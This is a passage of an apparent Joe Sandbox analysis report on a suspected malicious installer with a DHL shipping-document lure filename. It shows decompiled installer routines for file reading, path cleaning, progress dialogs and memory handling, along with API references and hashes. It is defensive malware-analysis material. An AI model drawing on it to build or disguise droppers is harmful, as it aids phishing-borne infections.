											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E004065AF( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
														__eax = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}








                        0x004026ec
                        0x004026ee
                        0x004026f1
                        0x004026f3
                        0x004026f6
                        0x004026fb
                        0x004026ff
                        0x00402702
                        0x00402705
                        0x00402c2a
                        0x00402c2d
                        0x0040270b
                        0x0040270b
                        0x00402712
                        0x00402714
                        0x00402714
                        0x0040271a
                        0x0040287e
                        0x0040287e
                        0x00402881
                        0x00402886
                        0x004015b6
                        0x0040292e
                        0x0040292e
                        0x00000000
                        0x00402720
                        0x00402721
                        0x0040272c
                        0x0040272f
                        0x0040273b
                        0x0040273f
                        0x004027d7
                        0x004027ef
                        0x004027ff
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00402745
                        0x00402745
                        0x00402748
                        0x00402749
                        0x0040274c
                        0x00402751
                        0x00402758
                        0x00402760
                        0x00000000
                        0x00402766
                        0x00402766
                        0x0040276b
                        0x00000000
                        0x00402771
                        0x00402771
                        0x00402779
                        0x0040277c
                        0x0040277f
                        0x0040283a
                        0x00402841
                        0x00402785
                        0x0040278b
                        0x00402797
                        0x00402801
                        0x00402801
                        0x00402799
                        0x00402799
                        0x0040279c
                        0x0040279e
                        0x0040279e
                        0x0040279e
                        0x004027a1
                        0x004027a6
                        0x004027a9
                        0x00000000
                        0x00000000
                        0x004027ab
                        0x004027ae
                        0x004027bc
                        0x004027c2
                        0x004027d0
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d2
                        0x00000000
                        0x004027d0
                        0x0040279e
                        0x00402804
                        0x00402807
                        0x00000000
                        0x00402809
                        0x0040280e
                        0x0040284f
                        0x00402871
                        0x00402878
                        0x0040285d
                        0x0040285d
                        0x00402860
                        0x00402863
                        0x00402866
                        0x00402866
                        0x00000000
                        0x00402817
                        0x00402817
                        0x0040281a
                        0x0040281d
                        0x00402823
                        0x00402827
                        0x0040282a
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040282a
                        0x0040280e
                        0x00402807
                        0x0040277f
                        0x0040276b
                        0x00402760
                        0x00000000
                        0x0040282c
                        0x0040282c
                        0x0040282f
                        0x00402838
                        0x00000000
                        0x0040272f
                        0x0040271a
                        0x00402c33
                        0x00402c39

                        APIs
                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                          • Part of subcall function 00406239: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 0040624F
                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: File$Pointer$ByteCharMultiWide$Read
                        • String ID: 9
                        • API String ID: 163830602-2366072709
                        • Opcode ID: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                        • Instruction ID: 581cf2785626502de532f206a1de9da9d9b8d20bcd24121b7f7bd1133decb9a2
                        • Opcode Fuzzy Hash: c494a9c5f1831dca55446a6dfc25bb45b63b896379fbbdb0ec38153142a3ac1c
                        • Instruction Fuzzy Hash: CE51FB75D00219AADF20EF95CA88AAEBB75FF04304F50417BE541B62D4D7B49D82CB58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 004068EF Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 69COMMON
                        Download Yara Rule
                        C-Code - Quality: 91%
                        			E004068EF(WCHAR* _a4) {
				short _t5;
				short _t7;
				WCHAR* _t19;
				WCHAR* _t20;
				WCHAR* _t21;

				_t20 = _a4;
				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
					_t20 =  &(_t20[4]);
				}
				if( *_t20 != 0 && E00405FAE(_t20) != 0) {
					_t20 =  &(_t20[2]);
				}
				_t5 =  *_t20;
				_t21 = _t20;
				_t19 = _t20;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((short*)(E00405F64(L"*?|<>/\":", _t5))) == 0) {
							E00406113(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
							_t19 = CharNextW(_t19);
						}
						_t20 = CharNextW(_t20);
						_t5 =  *_t20;
					} while (_t5 != 0);
				}
				 *_t19 =  *_t19 & 0x00000000;
				while(1) {
					_push(_t19);
					_push(_t21);
					_t19 = CharPrevW();
					_t7 =  *_t19;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t19 =  *_t19 & 0x00000000;
					if(_t21 < _t19) {
						continue;
					}
					break;
				}
				return _t7;
			}








                        0x004068f1
                        0x004068fa
                        0x00406911
                        0x00406911
                        0x00406918
                        0x00406924
                        0x00406924
                        0x00406927
                        0x0040692a
                        0x0040692f
                        0x00406931
                        0x0040693a
                        0x0040693e
                        0x0040695b
                        0x00406963
                        0x00406963
                        0x00406968
                        0x0040696a
                        0x0040696d
                        0x00406972
                        0x00406973
                        0x00406977
                        0x00406977
                        0x00406978
                        0x0040697f
                        0x00406981
                        0x00406988
                        0x00000000
                        0x00000000
                        0x00406990
                        0x00406996
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406996
                        0x0040699b

                        APIs
                        • CharNextW.USER32(?,*?|<>/":,00000000,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                        • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                        • CharNextW.USER32(?,00000000,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                        • CharPrevW.USER32(?,?,74D0FAA0,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Char$Next$Prev
                        • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                        • API String ID: 589700163-2982765560
                        • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                        • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                        • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 0040302E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E0040302E(intOrPtr _a4) {
				short _v132;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t15;

				if(_a4 != 0) {
					_t15 =  *0x420efc;
					if(_t15 != 0) {
						_t15 = DestroyWindow(_t15);
					}
					 *0x420efc = 0;
					return _t15;
				}
				if( *0x420efc != 0) {
					return E00406A71(0);
				}
				_t6 = GetTickCount();
				if(_t6 >  *0x42a26c) {
					if( *0x42a268 == 0) {
						_t7 = CreateDialogParamW( *0x42a260, 0x6f, 0, E00402F93, 0);
						 *0x420efc = _t7;
						return ShowWindow(_t7, 5);
					}
					if(( *0x42a314 & 0x00000001) != 0) {
						wsprintfW( &_v132, L"... %d%%", E00403012());
						return E004056CA(0,  &_v132);
					}
				}
				return _t6;
			}







                        0x0040303d
                        0x0040303f
                        0x00403046
                        0x00403049
                        0x00403049
                        0x0040304f
                        0x00000000
                        0x0040304f
                        0x0040305d
                        0x00000000
                        0x00403060
                        0x00403067
                        0x00403073
                        0x0040307b
                        0x004030b9
                        0x004030c2
                        0x00000000
                        0x004030c7
                        0x00403084
                        0x00403095
                        0x00000000
                        0x004030a3
                        0x00403084
                        0x004030cf

                        APIs
                        • DestroyWindow.USER32(?,00000000), ref: 00403049
                        • GetTickCount.KERNEL32 ref: 00403067
                        • wsprintfW.USER32 ref: 00403095
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                          • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                          • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                          • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                          • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                        • CreateDialogParamW.USER32 ref: 004030B9
                        • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                          • Part of subcall function 00403012: MulDiv.KERNEL32(?,00000064,?), ref: 00403027
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                        • String ID: ... %d%%
                        • API String ID: 722711167-2449383134
                        • Opcode ID: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                        • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                        • Opcode Fuzzy Hash: a65563718f57099a27635650194dd277da09fbe66beefc8d93bb4be83c5e7891
                        • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404F7F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00404F7F(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                        0x00404f8d
                        0x00404f9a
                        0x00404fa0
                        0x00404fde
                        0x00404fde
                        0x00404fed
                        0x00404ff4
                        0x00000000
                        0x00404ff6
                        0x00404fa2
                        0x00404fb1
                        0x00404fb9
                        0x00404fbc
                        0x00404fce
                        0x00404fd4
                        0x00404fdb
                        0x00000000
                        0x00404fdb
                        0x00000000

                        APIs
                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                        • GetMessagePos.USER32 ref: 00404FA2
                        • ScreenToClient.USER32 ref: 00404FBC
                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Message$Send$ClientScreen
                        • String ID: f
                        • API String ID: 41195575-1993550816
                        • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                        • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                        • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                        Download Yara Rule
                        C-Code - Quality: 100%
                        			E00402F93(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00403012();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a270 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                        0x00402fa3
                        0x00402fb1
                        0x00402fb7
                        0x00402fb7
                        0x00402fc5
                        0x00402fc7
                        0x00402fd3
                        0x00402fd8
                        0x00402fda
                        0x00402fda
                        0x00402fe5
                        0x00402ff5
                        0x00403007
                        0x00403007
                        0x0040300f

                        APIs
                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                        • wsprintfW.USER32 ref: 00402FE5
                        • SetWindowTextW.USER32(?,?), ref: 00402FF5
                        • SetDlgItemTextW.USER32 ref: 00403007
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Text$ItemTimerWindowwsprintf
                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                        • API String ID: 1451636040-1158693248
                        • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                        • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                        • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                        • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                        Download Yara Rule
                        C-Code - Quality: 93%
                        			E00402950(void* __ebx) {
				WCHAR* _t26;
				void* _t29;
				long _t37;
				void* _t49;
				void* _t52;
				void* _t54;
				void* _t56;
				void* _t59;
				void* _t60;
				void* _t61;

				_t49 = __ebx;
				_t52 = 0xfffffd66;
				_t26 = E00402DA6(0xfffffff0);
				_t55 = _t26;
				 *(_t61 - 0x40) = _t26;
				if(E00405FAE(_t26) == 0) {
					E00402DA6(0xffffffed);
				}
				E00406133(_t55);
				_t29 = E00406158(_t55, 0x40000000, 2);
				 *(_t61 + 8) = _t29;
				if(_t29 != 0xffffffff) {
					 *(_t61 - 0x38) =  *(_t61 - 0x2c);
					if( *(_t61 - 0x28) != _t49) {
						_t37 =  *0x42a274;
						 *(_t61 - 0x44) = _t37;
						_t54 = GlobalAlloc(0x40, _t37);
						if(_t54 != _t49) {
							E004035F8(_t49);
							E004035E2(_t54,  *(_t61 - 0x44));
							_t59 = GlobalAlloc(0x40,  *(_t61 - 0x28));
							 *(_t61 - 0x10) = _t59;
							if(_t59 != _t49) {
								E00403371(_t51,  *(_t61 - 0x2c), _t49, _t59,  *(_t61 - 0x28));
								while( *_t59 != _t49) {
									_t51 =  *_t59;
									_t60 = _t59 + 8;
									 *(_t61 - 0x3c) =  *_t59;
									E00406113( *((intOrPtr*)(_t59 + 4)) + _t54, _t60,  *_t59);
									_t59 = _t60 +  *(_t61 - 0x3c);
								}
								GlobalFree( *(_t61 - 0x10));
							}
							E0040620A( *(_t61 + 8), _t54,  *(_t61 - 0x44));
							GlobalFree(_t54);
							 *(_t61 - 0x38) =  *(_t61 - 0x38) | 0xffffffff;
						}
					}
					_t52 = E00403371(_t51,  *(_t61 - 0x38),  *(_t61 + 8), _t49, _t49);
					CloseHandle( *(_t61 + 8));
				}
				_t56 = 0xfffffff3;
				if(_t52 < _t49) {
					_t56 = 0xffffffef;
					DeleteFileW( *(_t61 - 0x40));
					 *((intOrPtr*)(_t61 - 4)) = 1;
				}
				_push(_t56);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t61 - 4));
				return 0;
			}













                        0x00402950
                        0x00402952
                        0x00402957
                        0x0040295c
                        0x0040295f
                        0x00402969
                        0x0040296d
                        0x0040296d
                        0x00402973
                        0x00402980
                        0x00402988
                        0x0040298b
                        0x00402997
                        0x0040299a
                        0x004029a0
                        0x004029ae
                        0x004029b3
                        0x004029b7
                        0x004029ba
                        0x004029c3
                        0x004029cf
                        0x004029d3
                        0x004029d6
                        0x004029e0
                        0x004029ff
                        0x004029e7
                        0x004029ec
                        0x004029f4
                        0x004029f7
                        0x004029fc
                        0x004029fc
                        0x00402a06
                        0x00402a06
                        0x00402a13
                        0x00402a19
                        0x00402a1f
                        0x00402a1f
                        0x004029b7
                        0x00402a33
                        0x00402a35
                        0x00402a35
                        0x00402a3f
                        0x00402a40
                        0x00402a44
                        0x00402a48
                        0x00402a4e
                        0x00402a4e
                        0x00402a55
                        0x004022f1
                        0x00402c2d
                        0x00402c39

                        APIs
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                        • GlobalFree.KERNEL32 ref: 00402A06
                        • GlobalFree.KERNEL32 ref: 00402A19
                        • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                        Memory Dump Source
                        • Source File: 00000000.00000002.266044855.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.266038010.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266059378.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266069645.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.266123296.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_DHL AWB SHIPPING DOCS_AWB_0009123.jbxd
                        Similarity
                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                        • String ID:
                        • API String ID: 2667972263-0
                        • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                        • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                        • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                        • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                        Download Yara Rule
                        C-Code - Quality: 77%
                        			E00404E71(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004066A5(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004066A5(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004066A5(_t44, _t50, 0x423748, 0x423748, _a8);
